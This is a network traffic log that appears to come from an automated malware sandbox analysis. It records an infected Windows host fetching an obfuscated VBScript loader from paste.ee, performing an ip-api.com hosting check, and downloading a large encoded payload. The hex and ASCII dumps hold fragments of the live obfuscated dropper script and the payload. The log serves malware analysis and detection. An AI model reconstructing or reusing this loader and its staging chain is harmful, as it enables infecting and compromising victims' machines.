Feb 15, 2024 19:42:31.291681051 CET	1286	IN	HTTP/1.1 200 OK Content-Type: text/plain Last-Modified: Tue, 06 Feb 2024 11:03:21 GMT Accept-Ranges: bytes ETag: "3f59c218ec58da1:0" Server: Microsoft-IIS/10.0 Date: Thu, 15 Feb 2024 18:42:31 GMT Content-Length: 327680 Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 44 4d 41 41 41 41 4d 41 77 41 51 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 6f 51 44 2b 6b 48 62 69 31 57 5a 7a 4e 58 59 76 77 6a 43 4e 34 7a 62 6d 35 57 53 30 4e 58 64 79 52 33 4c 38 41 43 49 4b 30 67 50 35 52 58 61 79 56 33 59 6c 4e 33 4c 38 41 43 49 67 41 69 43 4e 34 7a 63 6c Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIDMAAAAMAwAQDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoQD+kHbi1WZzNXYvwjCN4zbm5WS0NXdyR3L8ACIK0gP5RXayV3YlN3L8ACIgAiCN4zcl
Feb 15, 2024 19:42:31.291745901 CET	1286	IN	Data Raw: 64 57 5a 73 6c 6d 64 70 4a 48 55 6b 56 47 64 7a 56 57 64 78 56 6d 63 76 77 44 49 67 41 43 49 67 41 69 43 4e 34 7a 4c 69 55 32 63 73 46 6d 5a 69 30 7a 63 7a 56 32 59 6a 46 55 61 31 42 69 49 79 56 32 61 76 5a 6e 62 4a 4e 58 59 69 30 44 62 6c 5a 58 Data Ascii: dWZslmdpJHUkVGdzVWdxVmcvwDIgACIgAiCN4zLiU2csFmZi0zczV2YjFUa1BiIyV2avZnbJNXYi0DblZXZsBCblZXZM52bpRXdjVGeFRWZ0NXZ1FXZyxDIgACIgACIgoQD+IyM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2c64mc1JSPz5GbthHIzV2ZlxWa2lmcQRWZ0NXZ1FXZyxDIgACIgAiCN4Te0lmc1NWZzxDIgACI
Feb 15, 2024 19:42:31.291764021 CET	1286	IN	Data Raw: 61 41 49 48 41 35 42 41 63 41 38 47 41 44 42 41 41 41 51 48 41 6f 42 77 5a 41 6b 47 41 79 42 51 65 41 41 48 41 76 42 77 51 41 77 47 41 68 42 77 5a 41 55 47 41 4d 42 51 41 41 38 44 41 6b 43 41 41 41 41 41 41 6c 42 41 65 41 55 47 41 75 41 67 5a 41 Data Ascii: aAIHA5BAcA8GADBAAAQHAoBwZAkGAyBQeAAHAvBwQAwGAhBwZAUGAMBQAA8DAkCAAAAAAlBAeAUGAuAgZAkDAyAAMAADA5AQYAQDAhBQMAQDAkBQLAIGAjBQYAkDAtAQZAUDA5AANA0CAzAAZAkDAjBQLAMGAzAQNAgDAiBQNAQDAmBAAAUGAtBQYA4EAsBQYA4GAyBQZAQHAuBQSAEAApAAdAAAAwAgLAADAuAAMA4CAxAAAAA
Feb 15, 2024 19:42:31.291781902 CET	1286	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Feb 15, 2024 19:42:31.291799068 CET	1286	IN	Data Raw: 48 43 45 41 41 45 67 51 59 42 4b 68 44 4a 4c 6f 45 4f 6b 76 67 53 59 77 42 4f 34 51 41 44 4b 52 41 67 59 51 2f 43 4b 42 41 67 55 41 43 4a 4c 6f 45 42 30 73 67 53 55 68 44 4a 4c 6f 45 5a 46 6f 45 35 4c 6f 45 4f 63 77 42 57 6b 49 67 53 41 41 41 46 Data Ascii: HCEAAEgQYBKhDJLoEOkvgSYwBO4QADKRAgYQ/CKBAgUACJLoEB0sgSUhDJLoEZFoE5LoEOcwBWkIgSAAAF4QSBKRHBAwBIgQSBKRHJFoEJFoEdggDHcQEhERIRIgAAcQgAKRHAAgBIEIgS0BCDcACA4RAxLoEVcAATgQACAiBA4RA9JRFGgAAegQBdgQ7CKhBHwQ2CKBAgUQ5CKRABAiBlLoEAAQBO0tgSEAAGggDO0agSElEZL
Feb 15, 2024 19:42:31.291845083 CET	1286	IN	Data Raw: 45 51 67 42 4b 52 46 4f 34 67 41 41 6f 41 43 35 4a 52 45 43 4b 68 44 64 55 63 67 53 34 51 41 4e 4a 52 46 47 63 67 45 49 67 67 44 64 34 51 41 4e 4a 52 46 4f 67 67 44 4f 34 51 48 59 46 6f 45 4f 45 51 54 53 55 78 43 48 6b 42 43 73 46 6f 45 73 46 6f Data Ascii: EQgBKRFO4gAAoAC5JRECKhDdUcgS4QANJRFGcgEIggDd4QANJRFOggDO4QHYFoEOEQTSUxCHkBCsFoEsFoEB0kEVMwBNwVgREgCF0ogRoQAAYwCOEAAEQWgREgCFgwBIgwBIgACIogCIgwCcFYEdgACIgwEHgBCD0BCIggDdgACIkwBNAWgREgCF0QDBAABNKYEHEAAG0ogRsQAAYQjCGBCBAgBNKYENKYENKYECAwCIcACIcAC
Feb 15, 2024 19:42:31.291862965 CET	1286	IN	Data Raw: 41 45 67 77 41 64 4d 51 48 49 34 51 48 44 30 42 51 42 4b 68 44 4f 34 67 44 4f 34 51 48 4f 34 41 51 42 4b 52 41 4e 4a 52 46 51 63 77 48 49 34 41 43 4f 67 51 42 64 55 51 48 4f 67 77 42 4d 67 67 44 4f 49 51 58 53 55 68 44 43 6b 64 67 52 55 42 51 42 Data Ascii: AEgwAdMQHI4QHD0BQBKhDO4gDO4QHO4AQBKRANJRFQcwHI4ACOgQBdUQHOgwBMggDOIQXSUhDCkdgRUBQBKhDQFoEOAUgSEQTSUxBH4BCAFoEB0kEVAUgS4gDOgACO4AQBKRANJRFLcwGDEgCDMQHAACBIggDI4wAdMgDI0xAdMQHIgACOcAFIggDdAUgSEQTSUBQBKhDO0bgS4QvBKBQBKRANJRFLcAIxJoEAAQBI0agSklgSk
Feb 15, 2024 19:42:31.291898012 CET	1286	IN	Data Raw: 30 6b 45 56 45 79 42 59 68 41 43 4f 30 42 51 42 4b 52 41 4e 4a 52 46 41 46 6f 45 4f 34 41 48 59 55 52 67 53 77 52 46 42 4b 42 47 59 55 52 67 53 67 52 46 42 4b 52 49 52 55 52 67 53 67 42 48 49 67 42 47 49 67 52 49 52 77 42 43 59 67 41 47 49 6b 6c Data Ascii: 0kEVEyBYhACO0BQBKRANJRFAFoEO4AHYURgSwRFBKBGYURgSgRFBKRIRURgSgBHIgBGIgRIRwBCYgAGIklEIgQhBKhDO0bgS4QvBKBQBKRANJRFrcwTIgQnBKBCdGoEBUAAMgwAdUQHOQwBIklEZJhACAwBIMQHD0BCO0hDdggDdggDdgQvBKRH9GoEd4gDO0BQBKhD9GoEO0bgS4QvBKRMCKRvBKRHOAUgSEQTSUxGH0DHO4AH
Feb 15, 2024 19:42:31.291914940 CET	1286	IN	Data Raw: 45 64 45 41 49 48 67 41 43 31 47 6f 45 64 67 51 74 42 4b 52 48 41 46 6f 45 4f 34 51 42 43 4b 68 44 31 47 6f 45 31 47 6f 45 31 47 6f 45 4f 41 55 67 53 45 51 54 53 55 78 44 48 63 43 43 4f 49 77 42 45 67 41 43 4f 30 68 44 4f 34 51 48 47 63 67 43 49 Data Ascii: EdEAIHgAC1GoEdgQtBKRHAFoEO4QBCKhD1GoE1GoE1GoEOAUgSEQTSUxDHcCCOIwBEgACO0hDO4QHGcgCIggDd4gDO0hDOgwBMUQAKMgAO0bgSIAIHgACO0BQBKRANJRFAFoEOUQHF0hD9GoEO4QH9GoEAFoEB0kEV4wBmgACO0BCO0hDd4gDOEQTSUhDdowBUggDFIAAFgACI4ABHYgDVIoEBAiBRIoEAASBI0ggSEAIGkggSA
Feb 15, 2024 19:42:31.291933060 CET	1286	IN	Data Raw: 34 51 48 4a 46 6f 45 44 63 41 43 49 67 51 42 64 34 77 41 67 63 51 5a 52 55 51 48 46 30 52 42 64 4d 41 41 4b 45 61 67 52 30 5a 67 53 45 67 41 41 6b 41 43 46 30 52 42 64 4d 77 42 48 67 41 51 42 4b 42 43 4f 30 68 44 41 46 6f 45 42 30 6b 45 56 34 77 Data Ascii: 4QHJFoEDcACIgQBd4wAgcQZRUQHF0RBdMAAKEagR0ZgSEgAAkACF0RBdMwBHgAQBKBCO0hDAFoEB0kEV4wBHIBCOEAIEgAQBKRANJRFO4gDFcQDRGYEO4gDdMAAJgACO0BQBKRANJRFO4gDHcAEAMRATEAIGAwECEAIFklEIEAAFEwEAMRACAyBOESEC0lEVcQhBKBAgUQiBKBAAUACYAUgSEQTSUhDhEhAdJRFAFoEO4gDYURg
Feb 15, 2024 19:42:31.395497084 CET	1286	IN	Data Raw: 41 46 6b 4f 67 53 6b 4f 67 53 6b 4f 67 53 49 41 41 4c 6b 67 45 41 41 41 42 68 44 59 45 42 45 41 41 47 67 51 41 48 4d 41 41 41 41 41 41 41 49 41 41 41 41 77 41 41 45 41 44 41 41 41 41 41 41 51 41 41 41 41 41 44 41 51 41 4d 55 4e 67 52 45 4e 67 52 Data Ascii: AFkOgSkOgSkOgSIAALkgEAAABhDYEBEAAGgQAHMAAAAAAAIAAAAwAAEADAAAAAAQAAAAADAQAMUNgRENgREgAgkAAAAXd0V2cFAQAKEwc39mcoRlbvlGdwV2Y4Vkbv5EchJ3VWIAVAEAAB4BAAAAAAgAABgAAAkCdpJWL0YDKgMjLxEjLzAibvhGd5BlFAEwGAAAMuAjLw4SMHAQAMAAAu9Wa0FGZuV3bGBSZyF2d0Z2bTBibvh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49724	208.95.112.1	80	1812	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Feb 15, 2024 19:42:33.515954018 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Feb 15, 2024 19:42:33.611718893 CET	175	IN	HTTP/1.1 200 OK Date: Thu, 15 Feb 2024 18:42:32 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 10 X-Rl: 43 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49712	104.21.84.67	443	2620	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-15 18:42:01 UTC	149	OUT	GET /d/SDfNF HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: paste.ee
2024-02-15 18:42:01 UTC	1240	IN	HTTP/1.1 200 OK Date: Thu, 15 Feb 2024 18:42:01 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2DB%2BC%2FcuSdKVCjtDXg%2FqCaQvRiYHjf1L%2Fh9inNkmE2vesh9kg0FliX502A6Gvp6GfAyZjk5Gepr0G1WOE57XzDas0zu8CbwBThwa3GA2e%2FHgrOxZjf%2FIxZpMTQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 855fb035efde5e61-EWR alt-svc: h3=":443"; ma=86400
2024-02-15 18:42:01 UTC	129	IN	Data Raw: 31 66 37 66 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 6a 69 70 65 70 65 20 2c 20 74 6f 6d 62 61 64 6f 72 20 2c 20 66 61 72 61 75 74 65 20 2c 20 73 63 69 73 6d 61 20 2c 20 63 75 70 75 69 6d 20 2c 20 43 61 6d 61 20 2c 20 63 75 70 75 69 6d 31 0d 0a 20 20 20 20 20 74 6f 6d 62 61 64 6f 72 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 66 61 72 61 75 74 65 20 20 3d 20 22 22 20 26 20 73 63 69 73 6d Data Ascii: 1f7f dim jipepe , tombador , faraute , scisma , cupuim , Cama , cupuim1 tombador = " " faraute = "" & scism
2024-02-15 18:42:01 UTC	1369	IN	Data Raw: 61 20 26 20 74 6f 6d 62 61 64 6f 72 20 26 20 73 63 69 73 6d 61 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 59 51 42 74 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 Data Ascii: a & tombador & scisma & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTr
2024-02-15 18:42:01 UTC	1369	IN	Data Raw: 61 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 73 63 69 73 6d 61 20 26 20 74 6f 6d 62 61 64 6f 72 20 26 20 73 63 69 73 6d 61 20 26 20 22 51 42 68 44 67 54 72 65 47 4d 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 61 51 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 47 67 44 67 54 72 65 64 51 42 6d 44 67 54 72 65 47 59 44 67 54 72 65 62 44 67 54 72 65 42 6c 44 67 54 72 65 47 51 44 67 54 72 65 54 44 67 54 72 65 42 70 44 67 54 72 65 47 34 44 67 54 72 65 61 77 42 7a 44 67 54 72 65 43 6b 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 Data Ascii: a & "gBvDgTreHIDgTre" & scisma & tombador & scisma & "QBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7Dg
2024-02-15 18:42:01 UTC	1369	IN	Data Raw: 47 34 44 67 54 72 65 22 20 26 20 73 63 69 73 6d 61 20 26 20 74 6f 6d 62 61 64 6f 72 20 26 20 73 63 69 73 6d 61 20 26 20 22 51 42 33 44 67 54 72 65 46 38 44 67 54 72 65 61 51 42 74 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 73 63 69 73 6d 61 20 26 20 74 6f 6d 62 61 64 6f 72 20 26 20 73 63 69 73 6d 61 20 26 20 22 77 42 6c 44 67 54 72 65 46 38 44 67 54 72 65 64 77 42 7a 44 67 54 72 65 47 59 44 67 54 72 65 4c 67 42 71 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 22 20 26 20 73 63 69 73 6d 61 20 26 20 74 6f 6d 62 61 64 6f 72 20 26 20 73 63 69 73 6d 61 20 26 20 22 77 44 67 54 72 65 2f 44 67 54 72 65 44 45 44 67 54 72 65 4e 77 44 67 54 72 65 77 44 67 54 72 65 44 63 44 67 54 72 65 4f 44 67 54 72 65 44 67 54 72 65 79 44 67 54 72 65 44 59 44 67 54 72 65 4e Data Ascii: G4DgTre" & scisma & tombador & scisma & "QB3DgTreF8DgTreaQBtDgTreGEDgTre" & scisma & tombador & scisma & "wBlDgTreF8DgTredwBzDgTreGYDgTreLgBqDgTreHDgTreDgTre" & scisma & tombador & scisma & "wDgTre/DgTreDEDgTreNwDgTrewDgTreDcDgTreODgTreDgTreyDgTreDYDgTreN
2024-02-15 18:42:01 UTC	1369	IN	Data Raw: 46 73 44 67 54 72 65 55 77 42 35 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 6c 44 67 54 72 65 47 30 44 67 54 72 65 4c 67 42 55 44 67 54 72 65 47 55 44 67 54 72 65 65 44 67 54 72 65 42 30 44 67 54 72 65 43 34 44 67 54 72 65 52 51 42 75 44 67 54 72 65 47 4d 44 67 54 72 65 62 77 42 6b 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 46 30 44 67 54 72 65 4f 67 44 67 54 72 65 36 44 67 54 72 65 46 55 44 67 54 72 65 56 44 67 54 72 65 42 47 44 67 54 72 65 44 67 44 67 54 72 65 4c 67 42 48 44 67 54 72 65 47 55 44 67 54 72 65 64 44 67 54 72 65 42 54 44 67 54 72 65 48 51 44 67 54 72 65 63 67 42 70 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 73 63 69 73 6d 61 20 26 20 74 6f 6d 62 61 64 6f 72 20 26 20 73 63 69 73 6d 61 20 26 20 22 77 44 Data Ascii: FsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTre" & scisma & tombador & scisma & "wD
2024-02-15 18:42:01 UTC	1369	IN	Data Raw: 20 73 63 69 73 6d 61 20 26 20 22 51 42 55 44 67 54 72 65 47 55 44 67 54 72 65 65 44 67 54 72 65 42 30 44 67 54 72 65 43 34 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 73 63 69 73 6d 61 20 26 20 74 6f 6d 62 61 64 6f 72 20 26 20 73 63 69 73 6d 61 20 26 20 22 51 42 34 44 67 54 72 65 45 38 44 67 54 72 65 22 20 26 20 73 63 69 73 6d 61 20 26 20 74 6f 6d 62 61 64 6f 72 20 26 20 73 63 69 73 6d 61 20 26 20 22 67 44 67 54 72 65 6f 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 73 63 69 73 6d 61 20 26 20 74 6f 6d 62 61 64 6f 72 20 26 20 73 63 69 73 6d 61 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 52 67 42 73 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 73 63 69 73 6d 61 20 26 20 74 6f 6d 62 61 64 6f 72 20 26 20 73 63 Data Ascii: scisma & "QBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTre" & scisma & tombador & scisma & "QB4DgTreE8DgTre" & scisma & tombador & scisma & "gDgTreoDgTreCQDgTre" & scisma & tombador & scisma & "QBuDgTreGQDgTreRgBsDgTreGEDgTre" & scisma & tombador & sc
2024-02-15 18:42:01 UTC	1097	IN	Data Raw: 6b 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 65 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 69 44 67 54 72 65 47 45 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 44 59 44 67 54 72 65 4e 44 67 54 72 65 42 44 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 74 44 67 54 72 65 47 45 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 50 51 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 61 51 42 74 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 73 63 69 73 6d 61 20 26 20 74 6f 6d 62 61 64 6f 72 20 26 20 73 63 69 73 6d 61 20 26 20 22 77 42 6c 44 67 54 72 65 46 51 44 67 54 72 65 22 20 26 20 73 63 69 73 6d 61 20 26 20 74 6f 6d 62 61 64 6f 72 20 26 20 73 63 69 73 Data Ascii: kDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTre" & scisma & tombador & scisma & "wBlDgTreFQDgTre" & scisma & tombador & scis
2024-02-15 18:42:01 UTC	1369	IN	Data Raw: 31 30 39 65 0d 0a 6d 61 20 26 20 22 44 67 54 72 65 42 42 44 67 54 72 65 48 4d 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 47 30 44 67 54 72 65 59 67 42 73 44 67 54 72 65 48 6b 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 57 77 42 54 44 67 54 72 65 48 6b 44 67 54 72 65 63 77 42 30 44 67 54 72 65 47 55 44 67 54 72 65 62 51 44 67 54 72 65 75 44 67 54 72 65 46 49 44 67 54 72 65 22 20 26 20 73 63 69 73 6d 61 20 26 20 74 6f 6d 62 61 64 6f 72 20 26 20 73 63 69 73 6d 61 20 26 20 22 51 42 6d 44 67 54 72 65 47 77 44 67 54 72 65 22 20 26 20 73 63 69 73 6d 61 20 26 20 74 6f 6d 62 61 64 6f 72 20 26 20 73 63 69 73 6d 61 20 26 20 22 51 42 6a 44 67 54 72 65 48 51 44 67 54 72 65 61 51 42 76 44 67 54 72 65 47 34 44 67 54 Data Ascii: 109ema & "DgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTre" & scisma & tombador & scisma & "QBmDgTreGwDgTre" & scisma & tombador & scisma & "QBjDgTreHQDgTreaQBvDgTreG4DgT
